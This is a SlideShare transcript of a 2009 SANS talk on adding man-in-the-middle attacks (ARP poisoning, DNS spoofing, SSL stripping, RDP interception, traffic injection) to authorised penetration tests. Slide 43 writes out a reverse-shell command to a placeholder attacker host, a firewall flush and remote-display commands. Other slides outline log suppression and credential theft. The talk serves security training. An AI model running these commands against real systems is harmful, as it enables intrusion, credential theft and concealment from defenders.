Your SlideShare is downloading. ×
All your layer are belong to us
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

All your layer are belong to us

1,787
views

Published on

This presentation discusses various uses of man-in-the-middle attacks for penetration testers.

This presentation discusses various uses of man-in-the-middle attacks for penetration testers.

Published in: Technology

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,787
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
23
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. SANS Institute“Incorporating Advanced MitM Attacks in Your Penetration Testing Regimen" Layered Security Bryce Galbraith, Owner CISSP, GCIH, GSEC, CEH, CHFI, Security+, CCNA bryce@layeredsec.com http://blog.layeredsec.com/ ©2009 SANS & Bryce Galbraith 1
  • 2. SANS BiographyBryce Galbraith - Lead Consultant, Layered Security Bryce began his IT journey at 10 years of age with a Commodore 64 and a 300 baud modem. As a contributing author of the internationally bestselling book Hacking Exposed: Network Security Secrets & Solutions, Bryce helped bring the secret world of hacking out of the darkness and into the public eye. Bryce has held security positions at global ISPs and Fortune 500 companies as well as being a senior member of Foundstones world-renowned attack and penetration team. Bryce also served as senior instructor and co-author of Foundstones "Ultimate Hacking: Hands-On" series. He has taught the art of ethical hacking and countermeasures to thousands of IT professionals from a whos who of top companies, financial institutions, and government agencies around the globe. Bryce currently teaches Security 504: Hacker Techniques, Exploits and Incident Handling, Security 560: Network Penetration Testing and Ethical Hacking, Security 517: Cutting-Edge Hacking Techniques, Security 550: Advanced Information Recon, Security 401: SANS Security Essentials Bootcamp Style, and Security 561: Network Penetration Testing: Maximizing the Effectiveness of Reports, Exploits, and Command Shells for the SANS Institute. Bryce is an active member of several security-related professional organizations, he speaks at a variety of conferences, and he holds a number of certifications: CISSP, GCIH, GSEC, CEH, CHFI, Security+, and CCNA. Bryce is currently the lead consultant and co-founder of Layered Security. ©2009 SANS & Bryce Galbraith 2
  • 3. Coming Up!• Overview• Token Warnings• The Toolz• ARP-Poisoning Primer• The Attacks• The Future?• Q&A ©2009 SANS & Bryce Galbraith 3
  • 4. Overview• What do you do when traditional attack vectors fail? – Remote exploits, password guessing, web app attacks, etc. – Social Engineering? Physical attacks? – They rarely fail but if they do,• What’s left, the report? ©2009 SANS & Bryce Galbraith 4
  • 5. Overview• There are other options – MitM!• MitM attacks open up systems that might otherwise be impregnable. – No weak passwords, no public exploits, ACLs, strong authentication even – inconceivable, right!? Not exactly…• Besides, MitMs are cooler than guessing passwords or pwning weak systems ;) ©2009 SANS & Bryce Galbraith 5
  • 6. Overview• We’re going to discuss several strategic uses of MitM…• And the toolz you will need to perform them effectively.• We don’t have time to get into the weeds so I’m going to focus on the scenarios and the toolz… ©2009 SANS & Bryce Galbraith 6
  • 7. Token Warning• Always, always, always secure written permission prior to performing ANY testing.• Especially the things I’m about to show you.• Client-side attack focus – touchy! ©2009 SANS & Bryce Galbraith 7
  • 8. Token Warning• Additional considerations• MitM attacks are particularly dangerous on production networks.• They can seriously break things!• The toolz have gotten much better but they are not fool proof.• Always… ©2009 SANS & Bryce Galbraith 8
  • 9. Token Warning• RTFM – Read the Fine Manual ;) – Because, “There is no patch for stupidity.”• Turn off your personal firewall.• Practice, practice, practice!• Think before you act.• Did I mention permission? ©2009 SANS & Bryce Galbraith 9
  • 10. Toolz• Ok, so as with most of what we do, we are going to need some toolz.• Practice with these toolz in a lab environment until you are familiar with how they work AND how they fail to work ;) ©2009 SANS & Bryce Galbraith 10
  • 11. Toolz• dsniff • http://monkey.org/~dugsong/dsniff/• An oldie but a goodie• Mostly mentioned here to give credit where credit is do – nice!• Can still be useful… ©2009 SANS & Bryce Galbraith 11
  • 12. Toolz• dsniff – Passive • dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, webspy – MitM • arpspoof, macof, dnsspoof, sshmitm and webmitm ©2009 SANS & Bryce Galbraith 12
  • 13. Toolz• ettercap – http://ettercap.sourceforge.net/• Powerful MitM framework• Many, many features.• Extensible with plug-ins and ettercap “filters” – stay tuned!• Current development work?? ©2009 SANS & Bryce Galbraith 13
  • 14. Toolz• Paros Proxy – http://www.parosproxy.org/• Burp Suite – http://www.portswigger.net/• Web application proxies with many desirable features for manipulating web traffic – hmm… ©2009 SANS & Bryce Galbraith 14
  • 15. Toolz• IRS & Sterm – http://www.oxid.it/• A powerful duo for exploiting IP- based trust and gaining access to systems with ACLs specifically designed to keep you out! – Can spoof telnet sessions on a switch ©2009 SANS & Bryce Galbraith 15
  • 16. Toolz• Cain & Abel – http://www.oxid.it/• Deceptively easy – oh so powerful!• Too many features to list.• Stay tuned… ©2009 SANS & Bryce Galbraith 16
  • 17. Toolz• Wireshark – http://www.wireshark.org/• Good for analysis of traffic and protocols in use on network to find opportunities for exploitation.• A must have general purpose tool. ©2009 SANS & Bryce Galbraith 17
  • 18. Toolz• Metasploit – http://www.metasploit.com/• Not a MitM tool per say but very helpful in this whole process.• Some of the latest features in particular.• MitM Framework modules anyone? ©2009 SANS & Bryce Galbraith 18
  • 19. Toolz• KARMA – http://blog.trailofbits.com/karma/• Great for assisting you in attacking wireless clients.• Features are included in Metasploit as of v3.2. ©2009 SANS & Bryce Galbraith 19
  • 20. Toolz• Rainbow Tables – Google will guide you…• Can be used to crack strong passwords once gathered via MitM. – (e.g. 14 character random password in LanMan form, for example) ©2009 SANS & Bryce Galbraith 20
  • 21. Toolz• iptables & squid proxy• Your favorite scripting language(s)• Out-the-box thinking – A.K.A a devious mind ;) – “How can I monkey with this traffic to get what I’m after?” ©2009 SANS & Bryce Galbraith 21
  • 22. Toolz• tcpreplay – http://tcpreplay.synfin.net/trac/• nemesis – http://nemesis.sourceforge.net/• scapy – http://www.secdev.org/projects/scapy/• sslstrip – http://www.thoughtcrime.org/software/sslstrip/ ©2009 SANS & Bryce Galbraith 22
  • 23. Toolz• Hamster & Ferret – http://erratasec.blogspot.com/• The Middler – http://www.inguardians.com/tools/• ISR-evilgrade (particularly nasty) – http://www.infobyte.com.ar/• Browser Exploitation Framework (BeEF) – http://www.bindshell.net/tools/beef/• Many others… – “Top 100 Network Security Tools” • http://sectools.org/ ©2009 SANS & Bryce Galbraith 23
  • 24. Toolz• Last but not least,• If you’re going to be doing these attacks over wireless networks• You may need one of these… – They combat mind-control – And protect your brain from RF • http://zapatopi.net/afdb/ ;) ©2009 SANS & Bryce Galbraith 24
  • 25. Hey man…©2009 SANS & Bryce Galbraith 25
  • 26. ARP-Poisoning Primer• Before we get rolling I need to make sure everyone has at least a basic understanding of ARP- poisoning and how it can put us in the middle of the action.• An enabler for numerous attacks.• We have limited time so… ©2009 SANS & Bryce Galbraith 26
  • 27. ARP-Poisoning Primer• On an Ethernet subnet hosts need to know the MAC address(es) of the host(s) they are trying to send Ethernet frames to.• Enter, ARP (Address Resolution Protocol) – ARP resolves IPs to MAC addresses ©2009 SANS & Bryce Galbraith 27
  • 28. ARP-Poisoning Primer• ARP Requests go out to the broadcast addr FF:FF:FF:FF:FF:FF – Which host has IP w.x.y.z bound to your network adapter?• All hosts receive this broadcast – Even on a switch ©2009 SANS & Bryce Galbraith 28
  • 29. ARP-Poisoning Primer• Only the host with the requested IP bound to its adapter responds with an ARP Reply – I have w.x.y.z bound and my MAC address is xx:xx:xx:xx:xx:xx• Only the requester sees the reply ©2009 SANS & Bryce Galbraith 29
  • 30. ARP-Poisoning Primer• Once the MAC is learned a very important thing happens.• It is cached - for a while… – Seconds, minutes, hours - depending• Enter, ARP Cache Poisoning• What if WE can influence this cached ARP entry? ©2009 SANS & Bryce Galbraith 30
  • 31. ARP-Poisoning Primer• By sending an unrequested ARP Reply (a.k.a Gratuitous ARP Reply), to a host we can poison their ARP Cache with any MAC we choose.• Sweet!• Let’s poison them with our MAC? ©2009 SANS & Bryce Galbraith 31
  • 32. ARP-Poisoning Primer• If we tell both of them that we’re the other one, turn on a little IP- forwarding and…boom! We’re in the middle!• Now we’re talking…• Not just a local LAN attack either – Poison gateway as well ©2009 SANS & Bryce Galbraith 32
  • 33. ARP-Poisoning Primer• This attack puts us in a position to potentially influence EVERYthing that happens at Layers 2-7.• If it’s wireless, maybe Layer 1 even• What happens at Layers 2-7?? – What doesn’t happen is a shorter list!• It’s game on! ©2009 SANS & Bryce Galbraith 33
  • 34. ARP-Poisoning Primer• These attacks can even influence layers 8 and 9, “Politics & Funding" – The most impregnable layers of all!• Demonstrations of these techniques have freed up serious funding and/or caused sweeping policy changes… ©2009 SANS & Bryce Galbraith 34
  • 35. The Attacks• Now for the fun stuff!• I will lay out several scenarios where using MitM can be of particular use.• Let’s see how to crack the tough nuts!• Not theoretical! These work today… ©2009 SANS & Bryce Galbraith 35
  • 36. The Attacks• Credential Sniffing – A mainstay of MitM attacks! – I would be remiss if I didn’t mention it - oh so helpful! – MitM makes it possible on switches. – Cain, dnsiff and ettercap excel at this. ©2009 SANS & Bryce Galbraith 36
  • 37. The Attacks• Credential Sniffing – Web Proxy Logins over HTTP • Using Windows Domain credentials – doh! • I have seen this at numerous clients. – VoIP Sniffing • Nothing quite like it really. – And of course the old favorites… ©2009 SANS & Bryce Galbraith 37
  • 38. “Can you hear me now?”©2009 SANS & Bryce Galbraith 38
  • 39. The Attacks• So sniffing is awesome• It can make all the difference in an assessment,• But there are more interesting things that can be done, so let’s move on… ©2009 SANS & Bryce Galbraith 39
  • 40. The Attacks• Command Injection – Being able to inject arbitrary commands into an existing, authorized connection can be immensely helpful. – Great way to bypass strong authentication systems (e.g. one-time passwords, smart cards, DNA?, etc.) ©2009 SANS & Bryce Galbraith 40
  • 41. The Attacks• Command Injection – People rely too heavily on authentication and ignore the transport mechanism. • e.g. One-time password system over Telnet/HTTP – Btw, how are tokens synchronized? – Where is this data stored? ©2009 SANS & Bryce Galbraith 41
  • 42. ©2009 SANS & Bryce Galbraith 42
  • 43. The Attacks• Command Injection – Sample attacks for *nix targets • xterm –display [hackerIP]:0.0 & • iptables –F • Reverse Telnet – telnet [hackerIP] [port] | /bin/sh | telnet hackerIP [port] • Add an account, disable logging, tftp shadow file, run virtually any command… ©2009 SANS & Bryce Galbraith 43
  • 44. The Attacks• Command Injection – Sample attacks for Cisco gear • Clear/adjust an ACL • TFTP the router config back to you • Disable/reduce logging • Turn on a service that may help you – SNMP, ip proxy-arp, etc. – You get the idea… ©2009 SANS & Bryce Galbraith 44
  • 45. The Attacks• Re-Direction – DNS Spoofing • Allows you to direct victims wherever you like • Their URL looks legit (e.g. www.google.com) • Great for: – Delivering client-side attacks to more savvy users – Social Engineering – Advanced phishing attacks » Maybe impersonate the proxy login (if it isn’t already clear-text HTTP ;) ©2009 SANS & Bryce Galbraith 45
  • 46. The Attacks• Breaking Crypto – Being in the middle affords great opportunities to attack crypto systems as well • SSHv1, RDP, PPTP – RDP MitM yields all keystrokes typed during session • SSL (FTPS, POP3S, IMAPS, LDAPS) • SSL VPNs? Inconceivable! Right? – pwnd! Credentials and all traffic being routed. ©2009 SANS & Bryce Galbraith 46
  • 47. RDP MitM©2009 SANS & Bryce Galbraith 47
  • 48. RDP MitM©2009 SANS & Bryce Galbraith 48
  • 49. RDP MitM©2009 SANS & Bryce Galbraith 49
  • 50. RDP MitM©2009 SANS & Bryce Galbraith 50
  • 51. RDP MitM©2009 SANS & Bryce Galbraith 51
  • 52. RDP MitM©2009 SANS & Bryce Galbraith 52
  • 53. RDP MitM©2009 SANS & Bryce Galbraith 53
  • 54. RDP MitM©2009 SANS & Bryce Galbraith 54
  • 55. RDP MitM©2009 SANS & Bryce Galbraith 55
  • 56. RDP MitM©2009 SANS & Bryce Galbraith 56
  • 57. RDP MitM©2009 SANS & Bryce Galbraith 57
  • 58. RDP MitM No matter what your password is….:[Th3y_w1ll-N3v3r/Gu3$$Th1$0n3]:. ©2009 SANS & Bryce Galbraith 58
  • 59. The Attacks• Breaking Crypto – Downgrade Attacks • NTLM to LM – Rainbow Tables – done! – Pass-the-Hash Toolkit • PPTP CHAP to PAP • SSHv2 to SSHv1 • And others… ©2009 SANS & Bryce Galbraith 59
  • 60. The Attacks• Strategic DoS Attacks – What happens if a particular target router using AAA (e.g. RADIUS) can’t reach the server, say three times? • Fails to local login usually • Local password hash is in config – Sniff: TFTP, FTP, Telnet, HTTP, SNMP, etc. – Hi-jack once to get config, then DoS AAA access • Can bypass strong authentication entirely ©2009 SANS & Bryce Galbraith 60
  • 61. “These are not the logs The Attacks you’re looking for…”• Strategic DoS Attacks – How about syslog? • If we get in the middle of our target and the remote syslog facility… • We can create a warp in the space/time continuum where no log entries are stored! • Just from our target host! All other logging continues unaffected. • Once access is gained, local logs can be removed on the target as well – What hacker? ©2009 SANS & Bryce Galbraith 61
  • 62. The Attacks• So, I could go on with these types of scenarios but I want to focus on the particularly nasty attacks that MitM enables… ©2009 SANS & Bryce Galbraith 62
  • 63. The Attacks• Arbitrary Modification/Insertion – It’s all about trusting trust. – We have to trust at some level to get any work done (or “waste” time on non work-related activities ;) – What if the communications to/from the system we “trust” are influenced, real-time, by an attacker? Hmm… ©2009 SANS & Bryce Galbraith 63
  • 64. The Attacks• Arbitrary Modification/Insertion – The next several scenarios serve as an overview of the numerous opportunities MitM provides with common network traffic. – This actually affects ALL of US when we’re online as well. – “Turnabout is fair play”, as they say... ©2009 SANS & Bryce Galbraith 64
  • 65. The Attacks• Arbitrary Modification/Insertion – To get the ball rolling, here is a little scenario I cooked up to illustrate what I mean… • DNS spoof www.cnn.com to my machine • Proxy the web traffic using Paros Proxy • Use a filter to find/replace html on the return! – The victim(s) see… ©2009 SANS & Bryce Galbraith 65
  • 66. Virtually any page element or DNS request…©2009 SANS & Bryce Galbraith 66
  • 67. The Attacks• Arbitrary Modification/Insertion – Being able to modify or insert most anything we want opens up all sorts of opportunities. – Even if the user gets some kind of warning, it’s a “trusted” site right? – Can even bypass tools like the popular NoScript FireFox plug-in! ©2009 SANS & Bryce Galbraith 67
  • 68. The Attacks• Arbitrary Modification/Insertion – Scenarios • Insert nefarious web content into stream – JavaScript, ActiveX and other active we content… • Major enabler for XSS attacks • Steal auth/session cookies to re-use • IFrame attacks • Substitute any text, links, graphics at will • Replace a download link with your file ;) ©2009 SANS & Bryce Galbraith 68
  • 69. ©2009 SANS & Bryce Galbraith 69
  • 70. The Attacks• Arbitrary Modification/Insertion – Scenarios • Substitute imbedded video/audio links • Inject code to post their creds to you first without SSL, then establish SSL and post to the real site. – sslstrip does this • Replace a hyperlink with a UNC connection to cause Windows creds to be sent to you. ©2009 SANS & Bryce Galbraith 70
  • 71. The Attacks• Arbitrary Modification/Insertion – Scenarios • View contents of the Clipboard of the visiting browser – thank you Internet Explorer! • Pop up windows – “Your Google Toolbar is out-of-date. Click here to…” • ISR-evilgrade – truly nasty • Web-based e-mail – Read/modify messages/contacts, upload/download a different attachment real-time. ©2009 SANS & Bryce Galbraith 71
  • 72. The Attacks• Arbitrary Modification/Insertion – Scenarios • More realistic and elaborate Phishing and other Social Engineering attacks. – Real site content, slightly modified on the return. • Intranet sites – Phishing? • “Test” web-apps under the context of a legitimate user!? Are they hacking the site?? – By injecting SQL commands for instance ©2009 SANS & Bryce Galbraith 72
  • 73. The Attacks• Arbitrary Modification/Insertion – Scenarios • VoIP call setup and tear down manipulation – Often clear-text HTTP-like commands • IM traffic – “Check out this file!” • Stock “Pump n’ Dump” transactions • Inject SQL commands between web/app server and the database server – it’s the trusted web/app server, right? ©2009 SANS & Bryce Galbraith 73
  • 74. The Attacks• Arbitrary Modification/Insertion – Scenarios • Manipulate other protocols, custom protocols… • SCADA – The only limitation here is your imagination really… ©2009 SANS & Bryce Galbraith 74
  • 75. The Attacks• Arbitrary Modification/Insertion – Getting all of this setup on a local LAN is relatively straight forward. – Wireless is basically the same however it provides for additional opportunities. – Check out this very versatile rig that I use for some wireless attacks… ©2009 SANS & Bryce Galbraith 75
  • 76. The Attacks• Portable AP w/ Internet So many options… “concourse” Internet - Wireless broadband - Internet Connection Sharing (e.g. EV-DO, EDGE, 3G) D-Link DWL-G730AP - Built-in to many laptops today - Built-in wireless assoc to AP USB Access Point - Running Cain (Windows) - BackTrack in a VM or on a second laptop w/ another wireless card. ©2009 SANS & Bryce Galbraith 76
  • 77. The Attacks• Uh hmm… – Did I mention permission??• So what about the future? ©2009 SANS & Bryce Galbraith 77
  • 78. The Future?• We will likely see… – Additional side-jacking tools • Myspace, Facebook, Linkedin, web mail, etc. – RDP playback with full graphical display. Cain gets all the data… – Injection - SSL, RDP, SSHv1, SSHv2? – Additional downgrade attacks – Better VoIP Replay/modification toolz ©2009 SANS & Bryce Galbraith 78
  • 79. The Future?• How about… – A fully extensible and modular MitM framework built into Metasploit • Metasploit-in-the-Middle anyone?? • Metasploit 3.2 is a start… – RFID attacks? • “Elvis Comes Back from the Dead to Prove RFID ePassports Lack Security” ©2009 SANS & Bryce Galbraith 79
  • 80. The Future?©2009 SANS & Bryce Galbraith 80
  • 81. The Future?©2009 SANS & Bryce Galbraith 81
  • 82. I told you, man…©2009 SANS & Bryce Galbraith 82
  • 83. End-user awareness?Used in a test. Users couldn’t click it fast enough… ©2009 SANS & Bryce Galbraith 83
  • 84. Discretion?©2009 SANS & Bryce Galbraith 84
  • 85. The future?©2009 SANS & Bryce Galbraith 85
  • 86. SANS Institute“Incorporating Advanced MitM Attacks in Your Penetration Testing Regimen" Layered Security Bryce Galbraith, Lead Consultant & Co-Founder CISSP, GCIH, GSEC, CEH, CHFI, Security+, CCNA bryce@layeredsec.com http://blog.layeredsec.com/ ©2009 SANS & Bryce Galbraith 86

×